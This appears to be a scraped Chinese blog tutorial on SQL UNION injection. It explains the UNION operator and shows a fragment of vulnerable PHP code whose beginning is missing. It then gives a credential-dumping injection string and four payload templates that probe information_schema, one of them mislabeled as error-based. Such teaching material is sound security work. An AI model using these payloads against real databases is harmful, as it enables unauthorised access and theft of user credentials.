【sql注入-union注入】 union函数 联合注入

目录

union注入

一、语法介绍:

二、代码示例

网络安全O


union注入

一、语法介绍:

版本:

union函数是SQL语言中的一个操作符,用于将两个或多个查询结果合并成一个结果集。它适用于几乎所有主流的关系型数据库管理系统(RDBMS)

如所有的:MySQL、Oracle、Microsoft SQL Server、PostgreSQL、SQLite等关系型数据库


语法:

SELECT column1, column2 FROM table1 
UNION 
SELECT column1, column2 FROM table2;

使用SELECT语句来查询两个或多个表中的数据。然后,使用UNION关键字将这些查询结果合并在一起

(注:被合并的查询结果具有相同的列数和相似的数据类型。如果查询结果的列数不同或者数据类型不兼容,将会导致错误)

【sql注入-union注入】 union函数 联合注入_第1张图片


 

作用:

  1. 合并结果集:当我们需要将多个查询结果合并成一个结果集时,可以使用union函数。这样可以简化查询操作,减少代码的复杂性。
  2. 去重数据:union函数会自动去重,即将重复的行从结果集中剔除,只返回唯一的行。这在需要对两个或多个表中的数据进行合并,并消除重复数据时非常有用。
  3. 扩展查询:使用union函数可以将多个查询结果合并在一起,从而扩展查询的范围。我们可以在每个SELECT语句中使用不同的条件和过滤器,从不同的表中获取数据,并将它们合并成一个结果集



二、代码示例

示例:

";
        echo "密码: " . $row['password'] . "
"; } } else { // 输出错误信息 echo "查询失败"; } ?>

用户可以通过URL中的id参数来指定要查询的用户ID。然而,由于代码中没有对$id进行任何过滤或验证,攻击者可以在id参数中注入恶意的SQL代码。

可将id的参数注入恶意代码,如下

1' UNION SELECT username, password FROM users--

那么构造的SQL查询语句将变为:

SELECT * FROM users WHERE id = 1' UNION SELECT username, password FROM users--'

将会返回所有用户的用户名和密码,绕过了原本的查询条件

通过联合注入漏洞获取敏感信息,或者进行其他恶意操作


payload:

1、基于联合查询的union注入:

' UNION SELECT column1, column2, column3 FROM table_name--

2、基于错误的union注入:

' UNION ALL SELECT NULL, NULL, NULL, table_name FROM information_schema.tables--

3、基于盲注的union注入:

' UNION ALL SELECT NULL, (SELECT concat(table_name,0x0a,column_name) FROM information_schema.columns WHERE table_name='表名' LIMIT 1 OFFSET 0)#

4、基于堆叠查询的union注入:

'; SELECT 1,2,3 UNION ALL SELECT column1, column2, column3 FROM table_name--

…………

每一种sql注入的方法都可以尝试与union进行结合



网络安全O

README.md · 书半生/网络安全知识体系-实战中心 - 码云 - 开源中国 (gitee.com)正在上传…重新上传取消https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.mdicon-default.png?t=N658https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.md

GitHub - BLACKxZONE/Treasure_knowledgeicon-default.png?t=N658https://github.com/BLACKxZONE/Treasure_knowledge

你可能感兴趣的:(【黑色地带-实战中心】,web安全,安全,sql,数据库)